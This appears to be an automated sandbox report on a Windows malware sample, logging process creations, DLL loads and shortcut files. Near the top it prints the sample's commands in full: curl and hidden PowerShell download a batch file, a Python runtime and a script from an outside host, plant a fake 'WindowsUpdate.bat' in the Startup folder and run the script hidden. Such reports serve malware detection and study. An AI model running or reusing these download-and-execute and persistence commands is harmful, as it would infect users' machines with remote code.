Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio -o "C:\\Users\\Public\\libs.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://sealingshop.click/py/rose_tien -o "C:\\Users\\Public\\python39\\documents.py"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\python39\python.exe C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2156,i,11219645058494437623,14001891473156078966,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat" "	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden C:\\Users\\Public\\python39\\python C:\\Users\\Public\\python39\\documents.py;	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\python39\python.exe	Section loaded: python39.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: version.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: python3.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: sqlite3.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: pywintypes39.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: libffi-7.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\python39\python.exe	Section loaded: kernel.appcore.dll

Source: Google Drive.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
